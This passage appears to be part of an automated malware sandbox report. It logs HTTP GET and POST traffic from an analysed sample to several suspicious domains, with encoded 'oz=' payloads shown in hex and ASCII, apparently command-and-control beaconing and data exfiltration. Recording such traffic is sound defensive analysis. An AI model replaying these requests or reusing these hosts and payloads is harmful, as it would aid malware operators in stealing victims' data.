57 5a 62 55 70 6f 75 6c 32 76 63 31 37 41 72 57 41 6a 42 50 38 46 6f 4d 7a 56 4f 43 6c 36 4e 59 71 4c 41 54 55 6a 68 68 73 41 47 47 59 35 59 47 4a 6d 67 44 36 37 41 52 62 4a 78 2f 78 50 59 56 53 6c 6c 47 71 4a 4f 48 46 75 55 68 6e 63 4f 79 6c 39 6b 59 42 59 62 74 4d 50 75 2f 78 6f 33 79 55 52 47 75 62 78 54 6e 75 6d 59 34 30 49 43 66 48 43 61 6e 36 37 6c 79 4f 63 68 52 33 5a 38 59 78 32 6a 4b 64 48 61 63 79 41 37 47 68 48 2f 65 4c 41 59 34 4f 32 39 48 35 70 38 45 38 49 71 6c 51 45 4b 73 46 45 52 62 39 69 69 51 62 41 35 50 62 39 6d 6a 62 4f 48 36 48 6c 4c 63 6f 4c 4b 47 72 39 2f 2f 79 36 79 51 4d 68 30 37 75 63 41 4a 6e 4a 53 59 52 75 65 75 6d 53 5a 61 59 42 42 58 6f 54 58 54 33 2f 4f 7a 63 55 30 4e 51 75 53 7a 46 5a 48 4f 56 55 4b 59 58 4d 30 4d 62 74 43 37 4e 4e 6f 68 45 39 43 39 5a 76 48 39 49 56 67 47 6b 50 67 48 74 69 4e 30 5a 52 55 4b 45 42 78 71 72 32 39 62 75 69 39 5a 4e 4a 49 70 55 44 51 2f 6c 46 32 51 68 54 68 2f 33 49 4f 72 53 6e 4f 61 67 41 6c 4b 50 54 6d 4e 74 7a 2f 4c 47 4a 31 42 4f 4d 2b 53 45 31 62 74 66 34 33 56 75 74 51 33 45 63 67 78 42 62 6b 7a 7a 4c 64 56 55 4a 4f 53 38 4b 39 78 79 5a 78 34 30 48 46 33 54 53 68 56 69 31 35 65 4a 52 6b 30 4f 46 39 75 36 74 7a 4f 34 49 42 39 78 33 51 56 6c 38 57 34 6c 79 46 37 41 68 50 54 59 73 33 57 6c 4d 6f 55 75 61 62 73 53 51 59 73 53 79 73 75 57 34 6e 6c 62 71 6e 2f 72 4c 39 54 5a 63 67 5
        Source: global trafficHTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=
        Source: global trafficHTTP traffic detected: POST /7k8f/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopOrigin: http://www.dfmagazine.shopReferer: http://www.dfmagazine.shop/7k8f/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b 64 2f 31 64 50 45 33 59 63 59 69 46 44 41 48 71 30 44 63 59 4c 72 39 78 4b 4b 6c 71 72 6f 74 4c 4b 48 50 74 4b 4d 33 63 55 4a 44 50 7a 38 4e 39 64 37 77 7a 61 4e 63 33 35 36 76 4e 6c 57 38 4a 49 4c 4c 57 76 4e 59 71 54 42 6a 33 52 56 2b 67 46 5a 69 4a 79 71 6e 67 53 67 44 70 78 61 6f 67 2b 76 67 41 36 4b 47 2f 6c 62 6e 45 4d 49 72 48 62 70 4b 30 75 4e 6e 70 56 74 65 4b 79 66 41 39 5a 6d 79 72 35 61 33 42 4b 76 50 34 33 5a 69 66 72 71 55 69 33 31 49 58 64 50 66 4c 76 56 72 69 64 6a 50 36 2f 70 5a 6e 59 6c 45 63 4d 72 30 6c 4c 78 6a 6b 59 73 61 68 51 46 75 55 67 7a 7a 2b 33 39 55 41 2f 2b 36 66 32 4d 62 6c 5a 48 59 46 42 6d 55 50 69 5a 50 49 6d 75 4c 56 65 74 31 39 4f 52 6c 52 7a 39 58 67 77 6b 72 59 34 54 49 68 71 4f 45 7a 6d 58 65 2b 66 47 71 50 4a 54 55 66 79 63 59 74 36 61 2b 54 70 6e 64 4e 33 56 4a 63 64 4a 55 45 74 52 2b 54 2b 6b 50 30 52 44 77 72 75 32 48 50 46 55 57 58 7a 6d 67 6f 33 52 75 61 4c 68 56 4d 33 67 76 67 2f 32 59 2b 75 77 66 38 46 4f 51 44 69 4d 7a 37 2b 47 4e 41 48 2b 66 75 4f 36 6e 4f 53 44 4b 55 2f 61 77 6a 62 49 55 57 5a 46 31 47 46 53 70 6d 39 52 75 5a 30 32 38 62 43 39 30 32 68 71 53 6f 6d 57 6f 75 4e 4a 43 4b 59 68 31 4c 6b 35 79 6e 38 68 4e 32 73 69 78 39 62 62 6f 66 73 79 63 58 66 43 4b 61 35 76 43 6a 41 44 42 64 79 58 6c 31 41 56 46 77 6c 56 75 73 66 43 73 5a 6f 76 36 6a 4a 39 69 73 55 66 35 57 6c 72 62 61 79 59 55 51 2
        Source: global trafficHTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 78 39 33 75 35 4d 62 64 6b 46 72 35 56 62 4a 6d 63 54 65 57 6f 72 36 67 31 47 6f 75 2b 53 58 53 51 49 6b 74 2f 38 6d 2b 4b 59 78 67 46 41 75 4a 70 63 45 70 2b 70 6c 2b 39 46 34 78 43 37 53 42 70 66 44 67 6d 79 4a 71 66 79 36 79 39 70 52 42 30 32 78 42 53 36 6b 67 4a 6e 49 4f 70 41 78 53 75 78 58 36 70 46 53 57 59 53 31 58 43 7a 5a 4e 4d 74 4c 49 64 33 56 6b 79 7a 35 4b 78 6f 56 6e 62 77 48 62 4b 42 38 46 6d 47 51 6a 31 66 57 48 66 75 41 54 46 46 2b 42 41 66 2b 79 57 6f 6d 58 69 4f 66 57 76 2b 77 63 50 31 4a 37 4a 77 6a 48 39 61 38 32 77 61 43 76 51 78 68 69 6a 74 2b 5a 55 4d 33 78 78 50 45 7a 47 50 49 33 51 7a 49 5a 42 5a 37 66 34 35 44 62 7a 6d 45 36 44 51 6e 52 52 51 42 4f 44 51 61 42 78 76 56 41 34 36 52 66 73 6f 6a 52 45 65 79 61 59 45 64 46 73 4c 39 30 6b 65 48 52 66 38 68 4c 71 67 6f 4a 7a 58 59 33 52 58 54 4e 4e 2f 79 76 31 47 66 39 35 55 2b 77 55 48 2f 65 4b 4c 72 47 56 33 7a 36 6a 61 30 62 5a 53 47 6e 49 61 6f 79 4e 73 66 48 49 59 6c 4e 76 61 55 57 50 63 61 35 71 68 30 4a 32 45 59 35 6c 47 53 54 6b 68 6e 4f 43 74 37 6d 6b 64 55 55 4f 2b 45 30 6d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/s
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 31 50 49 4c 6d 53 64 79 5a 4c 39 78 55 75 4d 4f 79 5a 79 56 72 34 44 79 37 61 58 66 69 4d 38 42 53 37 54 79 54 42 57 49 4c 66 6b 2f 7a 63 4f 42 30 50 4b 35 2f 4e 7a 42 34 57 74 55 55 74 2f 4a 69 55 2b 38 32 6c 74 61 62 55 47 66 54 6d 42 46 36 7a 39 6e 63 56 33 58 64 47 73 43 4d 59 39 4d 68 51 76 4d 54 32 79 34 69 73 33 47 4f 5a 4d 34 59 59 68 36 4f 77 4a 6f 76 37 31 6e 31 4d 4e 6d 79 6d 63 41 75 6a 43 6e 41 41 79 49 4b 77 4b 46 6c 49 42 77 2f 43 68 69 48 58 2b 6b 54 50 79 32 6f 37 68 51 50 38 77 33 77 55 62 66 4c 70 4b 48 79 7a 34 52 55 6e 34 74 38 6f 2b 63 59 58 6c 36 36 58 6f 4b 34 79 34 44 69 74 64 55 2b 78 6d 63 49 34 59 4d 30 6c 4f 65 32 39 50 55 71 67 4a 78 51 58 6f 70 71 39 47 44 38 5a 65 4d 58 45 4d 62 77 7a 66 47 42 6e 31 6b 65 75 2f 76 4e 6f 35 76 69 54 57 50 54 75 5a 4f 6e 66 77 78 63 71 73 41 6f 6c 57 53 46 48 46 62 63 4e 44 31 7a 50 45 41 38 46 69 48 31 39 4a 35 5a 37 48 66 41 55 54 4d 68 63 31 76 46 45 57 4a 33 4d 59 6b 53 6a 39 4a 5a 59 76 79 59 46 5a 78 42 64 36 4f 54 48 41 6c 58 4f 2b 4f 52 44 61 72 49 36 4c 67 4b 6c 5a 66 76 35 6d 50 67 48 71 62 68 64 33 48 65 32 79 6e 30 35 55 6a 4c 47 76 76 30 32 46 50 67 63 6e 73 46 42 49 42 76 42 6a 42 31 79 2b 64 4b 67 59 49 30 53 78 4d 37 71 55 31 42 71 67 34 67 63 49 37 74 6e 76 48 37 57 5a 44 57 72 42 34 6c 71 56 55 57 41 52 5a 50 61 56 6c 6f 75 41 31 79 42 50 44 46 53 4e 62 69 35 63 72 66 2b 5a 38 2b 59 39 38 77 69 36 74 35 74 44 6f 79 42 74 42 34 58 4a 2f 56 55 7a 2b 34 59 6a 76 33 76 33 78 34 41 62 56 65 61 38 6d 68 7a 62 32 63 68 71 62 42 75 53 52 54 52 56 70 36 61 32 54 47 33 57 71 77 2b 6a 4d 6d 34 45 36 62 4b 2b 6c 5a 51 5a 44 69 6d 6c 6a 48 75 4a 30 73 44 68 37 54 2f 42 6e 32 34 73 48 4c 44 52 32 51 52 75 77 74 33 67 57 73 6d 66 53 7a 35 73 65 48 52 61 34 4b 7a 62 34 46 38 45 69 62 6d 34 61 45 6b 30 46 6d 79 54 4e 71 43 72 41 48 50 63 2b 5a 34 46 49 54 65 75 42 72 6a 62 4c 70 5a 6c 6d 69 7a 6a 54 39 6b 61 6a 66 76 7a 71 45 55 57 73 41 74 62 6e 71 4c 44 70 48 68 66 76 4e 58 31 77 4d 71 50 2b 7a 36 39 73 52 74 4e 61 64 70 54 37 50 72 55 4d 36 37 38 4e 7a 77 4d 64 6c 49 2f 76 52 4a 32 54 6e 6d 2b 55 5a 30 38 2b 58 38 62 47 32 6e 38 61 46 43 4f 41 43 4f 65 6f 4a 6b 34 44 2b 69 42 53 51 33 74 6b 32 5a 75 41 42 4d 67 47 43 79 5
